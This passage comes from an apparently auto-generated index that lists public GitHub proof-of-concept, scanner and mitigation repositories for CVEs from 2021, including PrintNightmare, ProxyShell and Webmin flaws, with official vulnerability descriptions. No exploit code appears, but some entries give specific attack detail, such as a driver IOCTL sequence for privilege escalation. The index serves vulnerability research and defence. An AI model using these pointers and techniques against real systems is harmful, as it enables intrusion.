- [mind2hex/CVE-2021-31630](https://github.com/mind2hex/CVE-2021-31630)
- [sealldeveloper/CVE-2021-31630-PoC](https://github.com/sealldeveloper/CVE-2021-31630-PoC)
- [junnythemarksman/CVE-2021-31630](https://github.com/junnythemarksman/CVE-2021-31630)
- [adibabdala123/cve-2021-31630](https://github.com/adibabdala123/cve-2021-31630)
- [manuelsantosiglesias/CVE-2021-31630](https://github.com/manuelsantosiglesias/CVE-2021-31630)
- [FlojBoj/CVE-2021-31630](https://github.com/FlojBoj/CVE-2021-31630)
### CVE-2021-31728 (2021-05-17)
Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware 2.74.0.150 allows a non-privileged process to open a handle to \.\ZemanaAntiMalware, register itself with the driver by sending IOCTL 0x80002010, allocate executable memory using a flaw in IOCTL 0x80002040, install a hook with IOCTL 0x80002044 and execute the executable memory using this hook with IOCTL 0x80002014 or 0x80002018, this exposes ring 0 code execution in the context of the driver allowing the non-privileged process to elevate privileges.
- [irql/CVE-2021-31728](https://github.com/irql/CVE-2021-31728)
### CVE-2021-31755 (2021-05-07)
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.
- [r3s3tt/CVE-2021-31755](https://github.com/r3s3tt/CVE-2021-31755)
### CVE-2021-31760 (2021-04-25)
Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to achieve Remote Command Execution (RCE) through Webmin's running process feature.
- [Mesh3l911/CVE-2021-31760](https://github.com/Mesh3l911/CVE-2021-31760)
- [electronicbots/CVE-2021-31760](https://github.com/electronicbots/CVE-2021-31760)
### CVE-2021-31761 (2021-04-25)
Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.
- [Mesh3l911/CVE-2021-31761](https://github.com/Mesh3l911/CVE-2021-31761)
- [electronicbots/CVE-2021-31761](https://github.com/electronicbots/CVE-2021-31761)
### CVE-2021-31762 (2021-04-25)
Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to create a privileged user through Webmin's add users feature, and then get a reverse shell through Webmin's running process feature.
- [Mesh3l911/CVE-2021-31762](https://github.com/Mesh3l911/CVE-2021-31762)
- [electronicbots/CVE-2021-31762](https://github.com/electronicbots/CVE-2021-31762)
### CVE-2021-31796 (2021-09-02)
An inadequate encryption vulnerability discovered in CyberArk Credential Provider before 12.1 may lead to Information Disclosure. An attacker may realistically have enough information that the number of possible keys (for a credential file) is only one, and the number is usually not higher than 2^36.
- [unmanarc/CACredDecoder](https://github.com/unmanarc/CACredDecoder)
### CVE-2021-31800 (2021-05-05)
Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
- [p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write](https://github.com/p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write)
- [Louzogh/CVE-2021-31800](https://github.com/Louzogh/CVE-2021-31800)
### CVE-2021-31805 (2022-04-12)
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
- [pyroxenites/s2-062](https://github.com/pyroxenites/s2-062)
- [Wrin9/CVE-2021-31805](https://github.com/Wrin9/CVE-2021-31805)
- [Axx8/Struts2_S2-062_CVE-2021-31805](https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805)
- [jax7sec/S2-062](https://github.com/jax7sec/S2-062)
- [aeyesec/CVE-2021-31805](https://github.com/aeyesec/CVE-2021-31805)
- [fleabane1/CVE-2021-31805-POC](https://github.com/fleabane1/CVE-2021-31805-POC)
- [z92g/CVE-2021-31805](https://github.com/z92g/CVE-2021-31805)
- [nth347/CVE-2021-31805](https://github.com/nth347/CVE-2021-31805)
### CVE-2021-31856 (2021-04-28)
A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
- [ssst0n3/CVE-2021-31856](https://github.com/ssst0n3/CVE-2021-31856)
### CVE-2021-31862 (2021-10-29)
SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication.
- [RobertDra/CVE-2021-31862](https://github.com/RobertDra/CVE-2021-31862)
### CVE-2021-31955 (2021-06-08)
Windows Kernel Information Disclosure Vulnerability
- [freeide/CVE-2021-31955-POC](https://github.com/freeide/CVE-2021-31955-POC)
### CVE-2021-31956 (2021-06-08)
Windows NTFS Elevation of Privilege Vulnerability
- [hzshang/CVE-2021-31956](https://github.com/hzshang/CVE-2021-31956)
- [aazhuliang/CVE-2021-31956-EXP](https://github.com/aazhuliang/CVE-2021-31956-EXP)
- [Y3A/CVE-2021-31956](https://github.com/Y3A/CVE-2021-31956)
- [hoangprod/CVE-2021-31956-POC](https://github.com/hoangprod/CVE-2021-31956-POC)
### CVE-2021-32099 (2021-05-07)
A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass.
- [zjicmDarkWing/CVE-2021-32099](https://github.com/zjicmDarkWing/CVE-2021-32099)
- [ibnuuby/CVE-2021-32099](https://github.com/ibnuuby/CVE-2021-32099)
- [l3eol3eo/CVE-2021-32099_SQLi](https://github.com/l3eol3eo/CVE-2021-32099_SQLi)
- [akr3ch/CVE-2021-32099](https://github.com/akr3ch/CVE-2021-32099)
### CVE-2021-32156 (2022-04-11)
A cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.
- [Mesh3l911/CVE-2021-32156](https://github.com/Mesh3l911/CVE-2021-32156)
### CVE-2021-32157 (2022-04-11)
A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.
- [Mesh3l911/CVE-2021-32157](https://github.com/Mesh3l911/CVE-2021-32157)
- [dnr6419/CVE-2021-32157](https://github.com/dnr6419/CVE-2021-32157)
### CVE-2021-32158 (2022-04-11)
A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Upload and Download feature.
- [Mesh3l911/CVE-2021-32158](https://github.com/Mesh3l911/CVE-2021-32158)
### CVE-2021-32159 (2022-04-11)
A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Upload and Download feature.
- [Mesh3l911/CVE-2021-32159](https://github.com/Mesh3l911/CVE-2021-32159)
### CVE-2021-32160 (2022-04-11)
A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the Add Users feature.
- [Mesh3l911/CVE-2021-32160](https://github.com/Mesh3l911/CVE-2021-32160)
### CVE-2021-32161 (2022-04-11)
A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the File Manager feature.
- [Mesh3l911/CVE-2021-32161](https://github.com/Mesh3l911/CVE-2021-32161)
### CVE-2021-32162 (2022-04-11)
A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 through the File Manager feature.
- [Mesh3l911/CVE-2021-32162](https://github.com/Mesh3l911/CVE-2021-32162)
### CVE-2021-32305 (2021-05-18)
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
- [sz-guanx/CVE-2021-32305](https://github.com/sz-guanx/CVE-2021-32305)
- [FredBrave/CVE-2021-32305-websvn-2.6.0](https://github.com/FredBrave/CVE-2021-32305-websvn-2.6.0)
### CVE-2021-32399 (2021-05-10)
net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI controller.
- [nanopathi/linux-4.19.72_CVE-2021-32399](https://github.com/nanopathi/linux-4.19.72_CVE-2021-32399)
### CVE-2021-32471 (2021-05-10)
Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data. For example, a tape head may have an unexpected location after the processing of input composed of As and Bs (instead of 0s and 1s). NOTE: the discoverer states "this vulnerability has no real-world implications."
- [intrinsic-propensity/turing-machine](https://github.com/intrinsic-propensity/turing-machine)
### CVE-2021-32537 (2021-07-07)
Realtek HAD contains a driver crashed vulnerability which allows local side attackers to send a special string to the kernel driver in a user’s mode. Due to unexpected commands, the kernel driver will cause the system crashed.
- [0vercl0k/CVE-2021-32537](https://github.com/0vercl0k/CVE-2021-32537)
### CVE-2021-32644 (2021-06-22)
Ampache is an open source web based audio/video streaming application and file manager. Due to a lack of input filtering versions 4.x.y are vulnerable to code injection in random.php. The attack requires user authentication to access the random.php page unless the site is running in demo mode. This issue has been resolved in 4.4.3.
- [dnr6419/CVE-2021-32644](https://github.com/dnr6419/CVE-2021-32644)
### CVE-2021-32648 (2021-08-26)
octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
- [Immersive-Labs-Sec/CVE-2021-32648](https://github.com/Immersive-Labs-Sec/CVE-2021-32648)
- [daftspunk/CVE-2021-32648](https://github.com/daftspunk/CVE-2021-32648)
### CVE-2021-32682 (2021-06-14)
elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
- [nickswink/CVE-2021-32682](https://github.com/nickswink/CVE-2021-32682)
### CVE-2021-32708 (2021-06-24)
Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.
- [fazilbaig1/CVE-2021-32708](https://github.com/fazilbaig1/CVE-2021-32708)
### CVE-2021-32724 (2021-09-09)
check-spelling is a github action which provides CI spell checking. In affected versions and for a repository with the [check-spelling action](https://github.com/marketplace/actions/check-spelling) enabled that triggers on `pull_request_target` (or `schedule`), an attacker can send a crafted Pull Request that causes a `GITHUB_TOKEN` to be exposed. With the `GITHUB_TOKEN`, it's possible to push commits to the repository bypassing standard approval processes. Commits to the repository could then steal any/all secrets available to the repository. As a workaround users may can either: [Disable the workflow](https://docs.github.com/en/actions/managing-workflow-runs/disabling-and-enabling-a-workflow) until you've fixed all branches or Set repository to [Allow specific actions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#allowing-specific-actions-to-run). check-spelling isn't a verified creator and it certainly won't be anytime soon. You could then explicitly add other actions that your repository uses. Set repository [Workflow permissions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#setting-the-permissions-of-the-github_token-for-your-repository) to `Read repository contents permission`. Workflows using `check-spelling/check-spelling@main` will get the fix automatically. Workflows using a pinned sha or tagged version will need to change the affected workflows for all repository branches to the latest version. Users can verify who and which Pull Requests have been running the action by looking up the spelling.yml action in the Actions tab of their repositories, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml - you can filter PRs by adding ?query=event%3Apull_request_target, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml?query=event%3Apull_request_target.
- [MaximeSchlegel/CVE-2021-32724-Target](https://github.com/MaximeSchlegel/CVE-2021-32724-Target)
### CVE-2021-32789 (2021-07-26)
woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
- [and0x00/CVE-2021-32789](https://github.com/and0x00/CVE-2021-32789)
- [DonVorrin/CVE-2021-32789](https://github.com/DonVorrin/CVE-2021-32789)
### CVE-2021-32804 (2021-08-03)
The npm package "tar" (aka node-tar) before versions 6.1.1, 5.0.6, 4.4.14, and 3.3.2 has a arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example `/home/user/.bashrc` would turn into `home/user/.bashrc`. This logic was insufficient when file paths contained repeated path roots such as `////home/user/.bashrc`. `node-tar` would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.2, 4.4.14, 5.0.6 and 6.1.1. Users may work around this vulnerability without upgrading by creating a custom `onentry` method which sanitizes the `entry.path` or a `filter` method which removes entries with absolute paths. See referenced GitHub Advisory for details. Be aware of CVE-2021-32803 which fixes a similar bug in later versions of tar.
- [yamory/CVE-2021-32804](https://github.com/yamory/CVE-2021-32804)
### CVE-2021-32819 (2021-05-14)
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.
- [Abady0x1/CVE-2021-32819](https://github.com/Abady0x1/CVE-2021-32819)
### CVE-2021-32849 (2022-01-26)
Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds.
- [bb33bb/CVE-2021-32849](https://github.com/bb33bb/CVE-2021-32849)
- [lowkey0808/cve-2021-32849](https://github.com/lowkey0808/cve-2021-32849)
### CVE-2021-33026 (2021-05-13)
The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. NOTE: a third party indicates that exploitation is extremely unlikely unless the machine is already compromised; in other cases, the attacker would be unable to write their payload to the cache and generate the required collision
- [CarlosG13/CVE-2021-33026](https://github.com/CarlosG13/CVE-2021-33026)
- [Agilevatester/FlaskCache_CVE-2021-33026_POC](https://github.com/Agilevatester/FlaskCache_CVE-2021-33026_POC)
### CVE-2021-33034 (2021-05-14)
In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value.
- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034)
### CVE-2021-33044 (2021-09-15)
The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
- [bp2008/DahuaLoginBypass](https://github.com/bp2008/DahuaLoginBypass)
- [Spy0x7/CVE-2021-33044](https://github.com/Spy0x7/CVE-2021-33044)
- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)
- [haingn/LoHongCam-CVE-2021-33044](https://github.com/haingn/LoHongCam-CVE-2021-33044)
### CVE-2021-33045 (2021-09-15)
The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
- [dongpohezui/cve-2021-33045](https://github.com/dongpohezui/cve-2021-33045)
### CVE-2021-33104 (2023-02-16)
Improper access control in the Intel(R) OFU software before version 14.1.28 may allow an authenticated user to potentially enable denial of service via local access.
- [rjt-gupta/CVE-2021-33104](https://github.com/rjt-gupta/CVE-2021-33104)
### CVE-2021-33558 (2021-05-27)
Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.
- [mdanzaruddin/CVE-2021-33558.](https://github.com/mdanzaruddin/CVE-2021-33558.)
- [anldori/CVE-2021-33558](https://github.com/anldori/CVE-2021-33558)
### CVE-2021-33560 (2021-06-08)
Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.
- [IBM/PGP-client-checker-CVE-2021-33560](https://github.com/IBM/PGP-client-checker-CVE-2021-33560)
### CVE-2021-33564 (2021-05-29)
An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
- [mlr0p/CVE-2021-33564](https://github.com/mlr0p/CVE-2021-33564)
- [dorkerdevil/CVE-2021-33564](https://github.com/dorkerdevil/CVE-2021-33564)
### CVE-2021-33624 (2021-06-23)
In kernel/bpf/verifier.c in the Linux kernel before 5.12.13, a branch can be mispredicted (e.g., because of type confusion) and consequently an unprivileged BPF program can read arbitrary memory locations via a side-channel attack, aka CID-9183671af6db.
- [benschlueter/CVE-2021-33624](https://github.com/benschlueter/CVE-2021-33624)
### CVE-2021-33690 (2021-09-15)
Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.
- [redrays-io/CVE-2021-33690](https://github.com/redrays-io/CVE-2021-33690)
### CVE-2021-33699 (2021-08-10)
Task Hijacking is a vulnerability that affects the applications running on Android devices due to a misconfiguration in their AndroidManifest.xml with their Task Control features. This allows an unauthorized attacker or malware to takeover legitimate apps and to steal user's sensitive information.
- [naroSEC/CVE-2021-33699_Task_Hijacking](https://github.com/naroSEC/CVE-2021-33699_Task_Hijacking)
### CVE-2021-33739 (2021-06-08)
Microsoft DWM Core Library Elevation of Privilege Vulnerability
- [freeide2017/CVE-2021-33739-POC](https://github.com/freeide2017/CVE-2021-33739-POC)
- [giwon9977/CVE-2021-33739_PoC_Analysis](https://github.com/giwon9977/CVE-2021-33739_PoC_Analysis)
### CVE-2021-33766 (2021-07-14)
Microsoft Exchange Server Information Disclosure Vulnerability
- [bhdresh/CVE-2021-33766](https://github.com/bhdresh/CVE-2021-33766)
- [demossl/CVE-2021-33766-ProxyToken](https://github.com/demossl/CVE-2021-33766-ProxyToken)
### CVE-2021-33831 (2021-09-07)
api/account/register in the TH Wildau COVID-19 Contact Tracing application through 2021-09-01 has Incorrect Access Control. An attacker can interfere with tracing of infection chains by creating 500 random users within 2500 seconds.
- [lanmarc77/CVE-2021-33831](https://github.com/lanmarc77/CVE-2021-33831)
### CVE-2021-33879 (2021-06-06)
Tencent GameLoop before 4.1.21.90 downloaded updates over an insecure HTTP connection. A malicious attacker in an MITM position could spoof the contents of an XML document describing an update package, replacing a download URL with one pointing to an arbitrary Windows executable. Because the only integrity check would be a comparison of the downloaded file's MD5 checksum to the one contained within the XML document, the downloaded executable would then be executed on the victim's machine.
- [mmiszczyk/cve-2021-33879](https://github.com/mmiszczyk/cve-2021-33879)
### CVE-2021-33909 (2021-07-20)
fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.
- [Liang2580/CVE-2021-33909](https://github.com/Liang2580/CVE-2021-33909)
- [baerwolf/cve-2021-33909](https://github.com/baerwolf/cve-2021-33909)
- [bbinfosec43/CVE-2021-33909](https://github.com/bbinfosec43/CVE-2021-33909)
- [ChrisTheCoolHut/CVE-2021-33909](https://github.com/ChrisTheCoolHut/CVE-2021-33909)
### CVE-2021-33959 (2023-01-18)
Plex media server 1.21 and before is vulnerable to ddos reflection attack via plex service.
- [lixiang957/CVE-2021-33959](https://github.com/lixiang957/CVE-2021-33959)
### CVE-2021-34045
- [Al1ex/CVE-2021-34045](https://github.com/Al1ex/CVE-2021-34045)
- [kenuosec/CVE-2021-34045](https://github.com/kenuosec/CVE-2021-34045)
### CVE-2021-34371 (2021-08-05)
Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through setSessionVariable. An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains.
- [zwjjustdoit/CVE-2021-34371.jar](https://github.com/zwjjustdoit/CVE-2021-34371.jar)
### CVE-2021-34428 (2021-06-22)
For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in.
- [Trinadh465/jetty_9.4.31_CVE-2021-34428](https://github.com/Trinadh465/jetty_9.4.31_CVE-2021-34428)
### CVE-2021-34429 (2021-07-15)
For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
- [ColdFusionX/CVE-2021-34429](https://github.com/ColdFusionX/CVE-2021-34429)
### CVE-2021-34470 (2021-07-14)
Microsoft Exchange Server Elevation of Privilege Vulnerability
- [technion/CVE-2021-34470scanner](https://github.com/technion/CVE-2021-34470scanner)
### CVE-2021-34473 (2021-07-14)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [cyberheartmi9/Proxyshell-Scanner](https://github.com/cyberheartmi9/Proxyshell-Scanner)
- [RaouzRouik/CVE-2021-34473-scanner](https://github.com/RaouzRouik/CVE-2021-34473-scanner)
- [p2-98/CVE-2021-34473](https://github.com/p2-98/CVE-2021-34473)
- [horizon3ai/proxyshell](https://github.com/horizon3ai/proxyshell)
- [je6k/CVE-2021-34473-Exchange-ProxyShell](https://github.com/je6k/CVE-2021-34473-Exchange-ProxyShell)
- [learningsurface/ProxyShell-CVE-2021-34473.py](https://github.com/learningsurface/ProxyShell-CVE-2021-34473.py)
- [kh4sh3i/ProxyShell](https://github.com/kh4sh3i/ProxyShell)
- [ipsBruno/CVE-2021-34473-NMAP-SCANNER](https://github.com/ipsBruno/CVE-2021-34473-NMAP-SCANNER)
- [f4alireza/CVE](https://github.com/f4alireza/CVE)
### CVE-2021-34481 (2021-07-16)
<p>A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p><strong>UPDATE</strong> August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. This security update changes the Point and Print default behavior; please see <a href="https://support.microsoft.com/help/5005652">KB5005652</a>.</p>\n
- [vpn28/CVE-2021-34481](https://github.com/vpn28/CVE-2021-34481)
### CVE-2021-34486 (2021-08-12)
Windows Event Tracing Elevation of Privilege Vulnerability
- [KaLendsi/CVE-2021-34486](https://github.com/KaLendsi/CVE-2021-34486)
- [b1tg/CVE-2021-34486-exp](https://github.com/b1tg/CVE-2021-34486-exp)
### CVE-2021-34496 (2021-07-14)
Windows GDI Information Disclosure Vulnerability
- [dja2TaqkGEEfA45/CVE-2021-34496](https://github.com/dja2TaqkGEEfA45/CVE-2021-34496)
### CVE-2021-34523 (2021-07-14)
Microsoft Exchange Server Elevation of Privilege Vulnerability
- [mithridates1313/ProxyShell_POC](https://github.com/mithridates1313/ProxyShell_POC)
- [SUPRAAA-1337/CVE-2021-34523](https://github.com/SUPRAAA-1337/CVE-2021-34523)
### CVE-2021-34527 (2021-07-02)
<p>A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p>UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.</p>\n<p>In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (<strong>Note</strong>: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):</p>\n<ul>\n<li>HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint</li>\n<li>NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)</li>\n<li>UpdatePromptSettings = 0 (DWORD) or not defined (default setting)</li>\n</ul>\n<p><strong>Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.</strong></p>\n<p>UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also <a href="https://support.microsoft.com/topic/31b91c02-05bc-4ada-a7ea-183b129578a7">KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates</a>.</p>\n<p>Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.</p>\n
- [DenizSe/CVE-2021-34527](https://github.com/DenizSe/CVE-2021-34527)
- [thomas-lauer/PrintNightmare](https://github.com/thomas-lauer/PrintNightmare)
- [JohnHammond/CVE-2021-34527](https://github.com/JohnHammond/CVE-2021-34527)
- [nemo-wq/PrintNightmare-CVE-2021-34527](https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527)
- [CnOxx1/CVE-2021-34527-1675](https://github.com/CnOxx1/CVE-2021-34527-1675)
- [rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint](https://github.com/rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint)
- [geekbrett/CVE-2021-34527-PrintNightmare-Workaround](https://github.com/geekbrett/CVE-2021-34527-PrintNightmare-Workaround)
- [byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream)
- [vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527](https://github.com/vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527)
- [powershellpr0mpt/PrintNightmare-CVE-2021-34527](https://github.com/powershellpr0mpt/PrintNightmare-CVE-2021-34527)
- [WidespreadPandemic/CVE-2021-34527_ACL_mitigation](https://github.com/WidespreadPandemic/CVE-2021-34527_ACL_mitigation)
- [glorisonlai/printnightmare](https://github.com/glorisonlai/printnightmare)
- [dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC](https://github.com/dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC)
- [Eutectico/Printnightmare](https://github.com/Eutectico/Printnightmare)
- [syntaxbearror/PowerShell-PrintNightmare](https://github.com/syntaxbearror/PowerShell-PrintNightmare)
- [0xirison/PrintNightmare-Patcher](https://github.com/0xirison/PrintNightmare-Patcher)
- [Tomparte/PrintNightmare](https://github.com/Tomparte/PrintNightmare)
- [Amaranese/CVE-2021-34527](https://github.com/Amaranese/CVE-2021-34527)
- [cyb3rpeace/CVE-2021-34527](https://github.com/cyb3rpeace/CVE-2021-34527)
- [m8sec/CVE-2021-34527](https://github.com/m8sec/CVE-2021-34527)
- [hackerhouse-opensource/cve-2021-34527](https://github.com/hackerhouse-opensource/cve-2021-34527)
- [d0rb/CVE-2021-34527](https://github.com/d0rb/CVE-2021-34527)
- [TieuLong21Prosper/detect_bruteforce](https://github.com/TieuLong21Prosper/detect_bruteforce)
- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784)
### CVE-2021-34558 (2021-07-15)
The crypto/tls package of Go through 1.16.5 does not properly assert that the type of public key in an X.509 certificate matches the expected type when doing a RSA based key exchange, allowing a malicious TLS server to cause a TLS client to panic.
- [alexzorin/cve-2021-34558](https://github.com/alexzorin/cve-2021-34558)
### CVE-2021-34600 (2022-01-20)
Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation.
- [x41sec/CVE-2021-34600](https://github.com/x41sec/CVE-2021-34600)
### CVE-2021-34621 (2021-07-07)
